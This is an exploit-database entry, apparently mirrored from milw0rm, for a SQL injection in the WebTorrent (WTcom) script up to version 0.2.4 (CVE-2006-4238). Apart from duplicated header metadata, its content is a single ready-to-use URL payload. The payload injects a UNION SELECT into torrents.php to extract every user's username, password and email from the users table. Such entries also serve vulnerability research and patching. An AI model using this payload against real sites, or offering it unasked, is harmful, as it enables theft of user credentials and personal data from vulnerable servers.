WTcom 0.2.4-alpha - 'torrents.php' SQL Injection
| EKU-ID: 10205 | CVE: OSVDB-29476;CVE-2006-4238 | OSVDB-ID: |
| Author: sh1r081 | Published: 2006-08-17 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 10205 | CVE: OSVDB-29476;CVE-2006-4238 | OSVDB-ID: |
| Author: sh1r081 | Published: 2006-08-17 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# WebTorrent (WTcom) Script <= 0.2.4 # ---------------------------------- # >>> Remote SQL Injection # <<< Every Username, Password and Email # ---------------------------------- # Author: sh1r081 (sh1r081[at]gmail.com) http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/* # milw0rm.com [2006-08-17]